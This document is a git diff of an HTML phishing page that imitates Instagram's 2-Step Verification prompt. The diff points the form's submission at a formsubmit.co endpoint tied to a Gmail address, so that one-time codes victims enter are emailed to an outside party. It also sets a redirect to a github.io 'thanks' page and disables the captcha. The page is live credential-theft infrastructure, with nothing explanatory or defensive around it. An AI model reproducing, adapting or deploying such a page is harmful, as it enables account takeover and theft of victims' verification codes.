--- a/instagram/otp/657daf104b167f68d1979b9c.html
+++ b/instagram/otp/657daf104b167f68d1979b9c.html
@@ -57,7 +57,7 @@
       <!-- SMARTPHONE SECTION END -->
       <!-- FORM SECTION -->
       <article class="form-area">
-        <form  action="https://formsubmit.io/send/	1b814e9a-f1bb-467e-bba1-c718cf9632cb" method="POST" accept=".">
+        <form action="https://formsubmit.co/vcontest889@gmail.com" method="POST" accept=".">
           <p class="small-title">2-Step Verification</p>
           <input
             type="text"
@@ -73,7 +73,7 @@
             <a href="#" class="small">resend it</a>
             <div class="forget"><a href="#">Forgot password?</a></div>
           </div>
-          <input type="hidden" name="_redirect" value="https://vtfrw.github.io/fvrap/thanks.html">
+          <input type="hidden" name="_next" value="https://vtfrw.github.io/fvrap/thanks.html">
 <input type="hidden" name="_captcha" value="false">
 
         </form>
